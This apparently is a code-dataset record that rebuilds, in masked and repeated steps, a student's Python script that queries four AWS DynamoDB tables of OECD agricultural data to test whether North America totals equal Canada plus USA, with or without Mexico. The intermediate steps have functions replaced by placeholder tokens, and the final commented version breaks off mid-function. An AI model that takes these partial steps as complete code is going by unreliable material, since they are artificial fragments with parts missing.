"blob_id": "284e4f79748c17d44518f2ce424db5b1697373dc",
"index": 3156,
"step-1": "<mask token>\n",
"step-2": "__version__ = '0.90.03'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
def main():
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
argc = len(sys.argv)
bad_usage_flag = False
if argc > 2:
bad_usage_flag = True
print('Error: Too many arguments.')
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
dynamodb_client = boto3.client('dynamodb')
dynamodb_resource = boto3.resource('dynamodb')
try:
dynamodb_client.list_tables()
except Exception as e:
print(
"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')"
)
sys.exit(f'[ERROR] {e}')
err_output = ''
table_list = dynamodb_client.list_tables()['TableNames']
print(f'Existing Tables: {table_list}')
for t in TABLE_LIST:
if t not in table_list:
err_output += (
f"Error: Invalid table name '{t}' - table does not exist.\n")
if err_output != '':
print(err_output.strip('\n'))
sys.exit(
'ERROR: Terminating program because unable to get table that does not exist.'
)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, 'r', newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
for row in csv_content:
if row[2] == 'variable':
variable_encodings_dict[row[0]] = row[1]
elif row[2] == 'commodity':
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
if argc == 2:
commodity_input = sys.argv[1]
else:
commodity_input = input('Commodity: ').strip()
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input,
commodity_encodings_dict)
print(f'ENCODING: {commodity_code}')
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit(
'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'
)
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict,
commodity_encodings_dict)
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = 'CAN+USA'
elif total_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'
)
print(
f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n'
)
def convert_dict_label_to_code_key(label, encodings_dict):
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).
index(label)]
else:
return None
<|reserved_special_token_0|>
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))
return response['Count'] > 0
def output_table(commodity_code, variable, variable_encodings_dict,
commodity_encodings_dict):
global total_can_usa
global total_can_usa_mex
global total_neither
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
print(f'Variable: {variable_encodings_dict[variable]}')
print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',
'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))
na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
for year in YEAR_RANGE:
i = year - 2010
na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']
can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][
'mfactor']
usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][
'mfactor']
mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][
'mfactor']
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,
mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = 'CAN+USA'
elif temp_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'
)
print(f'Therefore we can conclude North America = {na_defn}\n')
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
def data_sort(elem):
return elem['year']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
argc = len(sys.argv)
bad_usage_flag = False
if argc > 2:
bad_usage_flag = True
print('Error: Too many arguments.')
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
dynamodb_client = boto3.client('dynamodb')
dynamodb_resource = boto3.resource('dynamodb')
try:
dynamodb_client.list_tables()
except Exception as e:
print(
"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')"
)
sys.exit(f'[ERROR] {e}')
err_output = ''
table_list = dynamodb_client.list_tables()['TableNames']
print(f'Existing Tables: {table_list}')
for t in TABLE_LIST:
if t not in table_list:
err_output += (
f"Error: Invalid table name '{t}' - table does not exist.\n")
if err_output != '':
print(err_output.strip('\n'))
sys.exit(
'ERROR: Terminating program because unable to get table that does not exist.'
)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, 'r', newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
for row in csv_content:
if row[2] == 'variable':
variable_encodings_dict[row[0]] = row[1]
elif row[2] == 'commodity':
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
if argc == 2:
commodity_input = sys.argv[1]
else:
commodity_input = input('Commodity: ').strip()
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input,
commodity_encodings_dict)
print(f'ENCODING: {commodity_code}')
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit(
'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'
)
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict,
commodity_encodings_dict)
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = 'CAN+USA'
elif total_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'
)
print(
f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n'
)
def convert_dict_label_to_code_key(label, encodings_dict):
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).
index(label)]
else:
return None
def is_common_variable(commodity_code, variable):
return has_commodity_and_variable(na_table, commodity_code, variable
) and has_commodity_and_variable(canada_table, commodity_code, variable
) and has_commodity_and_variable(usa_table, commodity_code, variable
) and has_commodity_and_variable(mexico_table, commodity_code, variable
)
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))
return response['Count'] > 0
def output_table(commodity_code, variable, variable_encodings_dict,
commodity_encodings_dict):
global total_can_usa
global total_can_usa_mex
global total_neither
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
print(f'Variable: {variable_encodings_dict[variable]}')
print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',
'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))
na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
for year in YEAR_RANGE:
i = year - 2010
na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']
can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][
'mfactor']
usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][
'mfactor']
mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][
'mfactor']
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,
mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = 'CAN+USA'
elif temp_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'
)
print(f'Therefore we can conclude North America = {na_defn}\n')
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
def data_sort(elem):
return elem['year']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
argc = len(sys.argv)
bad_usage_flag = False
if argc > 2:
bad_usage_flag = True
print('Error: Too many arguments.')
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
dynamodb_client = boto3.client('dynamodb')
dynamodb_resource = boto3.resource('dynamodb')
try:
dynamodb_client.list_tables()
except Exception as e:
print(
"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')"
)
sys.exit(f'[ERROR] {e}')
err_output = ''
table_list = dynamodb_client.list_tables()['TableNames']
print(f'Existing Tables: {table_list}')
for t in TABLE_LIST:
if t not in table_list:
err_output += (
f"Error: Invalid table name '{t}' - table does not exist.\n")
if err_output != '':
print(err_output.strip('\n'))
sys.exit(
'ERROR: Terminating program because unable to get table that does not exist.'
)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, 'r', newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
for row in csv_content:
if row[2] == 'variable':
variable_encodings_dict[row[0]] = row[1]
elif row[2] == 'commodity':
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
if argc == 2:
commodity_input = sys.argv[1]
else:
commodity_input = input('Commodity: ').strip()
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input,
commodity_encodings_dict)
print(f'ENCODING: {commodity_code}')
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit(
'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'
)
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict,
commodity_encodings_dict)
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = 'CAN+USA'
elif total_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'
)
print(
f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n'
)
def convert_dict_label_to_code_key(label, encodings_dict):
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).
index(label)]
else:
return None
def is_common_variable(commodity_code, variable):
return has_commodity_and_variable(na_table, commodity_code, variable
) and has_commodity_and_variable(canada_table, commodity_code, variable
) and has_commodity_and_variable(usa_table, commodity_code, variable
) and has_commodity_and_variable(mexico_table, commodity_code, variable
)
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))
return response['Count'] > 0
def output_table(commodity_code, variable, variable_encodings_dict,
commodity_encodings_dict):
global total_can_usa
global total_can_usa_mex
global total_neither
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
print(f'Variable: {variable_encodings_dict[variable]}')
print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',
'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))
na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
for year in YEAR_RANGE:
i = year - 2010
na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']
can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][
'mfactor']
usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][
'mfactor']
mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][
'mfactor']
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,
mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = 'CAN+USA'
elif temp_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'
)
print(f'Therefore we can conclude North America = {na_defn}\n')
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
def data_sort(elem):
return elem['year']
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import boto3
import csv
import sys
from boto3.dynamodb.conditions import Key, Attr
NORTH_AMERICA = 'northamerica'
CANADA = 'canada'
USA = 'usa'
MEXICO = 'mexico'
TABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]
YEAR_RANGE = range(2010, 2030)
OUTPUT_FORMAT = '{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}'
ENCODINGS_CSV = 'encodings.csv'
USAGE_STATEMENT = 'Usage: py queryOECD.py <commodity-code|commodity-label>'
def main():
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
argc = len(sys.argv)
bad_usage_flag = False
if argc > 2:
bad_usage_flag = True
print('Error: Too many arguments.')
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
dynamodb_client = boto3.client('dynamodb')
dynamodb_resource = boto3.resource('dynamodb')
try:
dynamodb_client.list_tables()
except Exception as e:
print(
"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')"
)
sys.exit(f'[ERROR] {e}')
err_output = ''
table_list = dynamodb_client.list_tables()['TableNames']
print(f'Existing Tables: {table_list}')
for t in TABLE_LIST:
if t not in table_list:
err_output += (
f"Error: Invalid table name '{t}' - table does not exist.\n")
if err_output != '':
print(err_output.strip('\n'))
sys.exit(
'ERROR: Terminating program because unable to get table that does not exist.'
)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, 'r', newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
for row in csv_content:
if row[2] == 'variable':
variable_encodings_dict[row[0]] = row[1]
elif row[2] == 'commodity':
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
if argc == 2:
commodity_input = sys.argv[1]
else:
commodity_input = input('Commodity: ').strip()
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input,
commodity_encodings_dict)
print(f'ENCODING: {commodity_code}')
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit(
'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'
)
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict,
commodity_encodings_dict)
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = 'CAN+USA'
elif total_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'
)
print(
f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n'
)
def convert_dict_label_to_code_key(label, encodings_dict):
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).
index(label)]
else:
return None
def is_common_variable(commodity_code, variable):
return has_commodity_and_variable(na_table, commodity_code, variable
) and has_commodity_and_variable(canada_table, commodity_code, variable
) and has_commodity_and_variable(usa_table, commodity_code, variable
) and has_commodity_and_variable(mexico_table, commodity_code, variable
)
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))
return response['Count'] > 0
def output_table(commodity_code, variable, variable_encodings_dict,
commodity_encodings_dict):
global total_can_usa
global total_can_usa_mex
global total_neither
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
print(f'Variable: {variable_encodings_dict[variable]}')
print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',
'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))
na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
for year in YEAR_RANGE:
i = year - 2010
na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']
can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][
'mfactor']
usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][
'mfactor']
mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][
'mfactor']
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,
mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = 'CAN+USA'
elif temp_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'
)
print(f'Therefore we can conclude North America = {na_defn}\n')
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
def data_sort(elem):
return elem['year']
main()
<|reserved_special_token_1|>
#!/usr/bin/env python
'''
@author : Mitchell Van Braeckel
@id : 1002297
@date : 10/10/2020
@version : python 3.8-32 / python 3.8.5
@course : CIS*4010 Cloud Computing
@brief : A1 Part 2 - AWS DynamoDB ; Q2 - Query OECD
@note :
Description: There are many CSV files containing info from the OECD about agricultural production, each for various regions around the world.
Queries all 4 tables (northamerica, canada, usa, mexico -table names) based on a commodity (code key or label),
looking for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,
then output the specific NA definition 'hit' results and probable conclusion for NA definition per variable,
as well as an overall conclusion for NA definition
NOTE: forgot to add ability to specify commodity as cmd line arg instead of STDIN
NOTE: assume year range is 2010 to 2029 (inclusive)
NOTE: assume perfect user input for commodity and variables
- however, if input commodity that's not a valid commodity code or label, exits program with error message
NOTE: NA definition hit refers to if the calculated sum from different tables of CAN, USA, MEX are equal to that of NA (CAN+USA, CAN+USA+MEX, or Neither)
'''
'''
IMPROVEMENT: Use 'encodings' table instead of the CSV file
'''
############################################# IMPORTS #############################################
# IMPORTS - 'pip install <import-package>'
import boto3
import csv
import sys
from boto3.dynamodb.conditions import Key, Attr
############################################ CONSTANTS ############################################
# TABLE CONSTANTS
NORTH_AMERICA = "northamerica"
CANADA = "canada"
USA = "usa"
MEXICO = "mexico"
TABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]
YEAR_RANGE = range(2010, 2030)
# OTHER CONSTANTS
OUTPUT_FORMAT = "{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}"
ENCODINGS_CSV = "encodings.csv"
#ENCODINGS_TABLE_NAME = "encodings"
USAGE_STATEMENT = "Usage: py queryOECD.py <commodity-code|commodity-label>"
############################## STATE VARIABLES, INITIALIZATION, MAIN ##############################
# MAIN - Declares global vars and state here, then ask for commodity (check both key/label),
# look for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,
# then output the specific NA definition 'hit' results and probable conclusion for NA definition
def main():
#globals
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
# ========== ARGUMENTS ==========
# Collect command line arguments when executing this python script
argc = len(sys.argv)
bad_usage_flag = False
# Check #of args (deal with it later tho)
# 1 optional arg for commodity, otherwise prompt user for it
if argc > 2:
bad_usage_flag = True
print("Error: Too many arguments.")
# Exit with usage statement if flag has been triggered for any reason
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
# ========== AWS DYNAMO DB ==========
# Init AWS DynamoDB client and resource (NOTE: these are global)
dynamodb_client = boto3.client("dynamodb")
dynamodb_resource = boto3.resource("dynamodb")
# Validate AWS DynamoDB credentials (by testing if 'list_tables()' works)
try:
dynamodb_client.list_tables()
except Exception as e:
print("Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')")
sys.exit(f"[ERROR] {e}")
# Check the 4 tables exist, then get them all
err_output = ""
table_list = dynamodb_client.list_tables()['TableNames']
print(f"Existing Tables: {table_list}")
for t in TABLE_LIST:
if t not in table_list:
err_output += f"Error: Invalid table name '{t}' - table does not exist.\n"
# Print all tables that did not exist, then exit
if err_output != "":
print(err_output.strip("\n"))
sys.exit("ERROR: Terminating program because unable to get table that does not exist.")
# Get all tables (after checking they exist) (NOTE: these are global)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
# Open the encodings CSV file and read its contents
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, "r", newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
# if field is var or commodity, set a key-value pair between code and label (in the respective map)
for row in csv_content:
if row[2] == "variable":
variable_encodings_dict[row[0]] = row[1]
elif row[2] == "commodity":
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
# Check args for commodity now, otherwise prompt user
if argc == 2:
commodity_input = sys.argv[1]
else:
# Ask user for commodity
commodity_input = input("Commodity: ").strip()
# Check if input exists as code key, otherwise try to convert assumed label to code key (if not a label, code will be None after)
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input, commodity_encodings_dict)
# Check if commodity found a code or None
print(f"ENCODING: {commodity_code}")
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit("ERROR: Terminating program because input does not exist as an encoding commodity code or label.")
# Init total accumulators for each category
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
# iterate through each variable and analyze data (if applicable)
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict, commodity_encodings_dict)
# Determine the NA definition for this variable based on #of 'hits' per year
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = "CAN+USA"
elif total_can_usa_mex == max_hits:
na_defn = "CAN+USA+MEX"
else:
na_defn = "Neither"
print(f"Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither")
print(f"Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n")
############################################ FUNCTIONS ############################################
# Converts the label of a dict into its code key, returns None if not a label
def convert_dict_label_to_code_key(label, encodings_dict):
# Get the key of the label if the label exists in the dict as a value
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).index(label)]
else:
return None
# Check if a commodity code + variable is common across all 4 tables, return true if it is
def is_common_variable(commodity_code, variable):
return (has_commodity_and_variable(na_table, commodity_code, variable) and
has_commodity_and_variable(canada_table, commodity_code, variable) and
has_commodity_and_variable(usa_table, commodity_code, variable) and
has_commodity_and_variable(mexico_table, commodity_code, variable))
# Check if a table has data for commodity code + variable (ie. scan table), returns true if at least 1 item is found
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(
FilterExpression = Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)
return response['Count'] > 0
# Retrieves and outputs table data based on commodity and variable and analyze for NA definition
def output_table(commodity_code, variable, variable_encodings_dict, commodity_encodings_dict):
# Bring in globals to modify
global total_can_usa
global total_can_usa_mex
global total_neither
# Init local accumulators
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
# Print table headers: common variable (for commodity code) across all 4 tables, and table column names
print(f"Variable: {variable_encodings_dict[variable]}")
print(OUTPUT_FORMAT.format("Year", "North America", "Canada", "USA", "Mexico", "CAN+USA", "CAN+USA+MEX", "NA Defn"))
# Retrieve all data, from all years (ie. the items from the scan)
na_scan_data = na_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
can_scan_data = canada_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
usa_scan_data = usa_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
mex_scan_data = mexico_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
# Sort each scan data by key
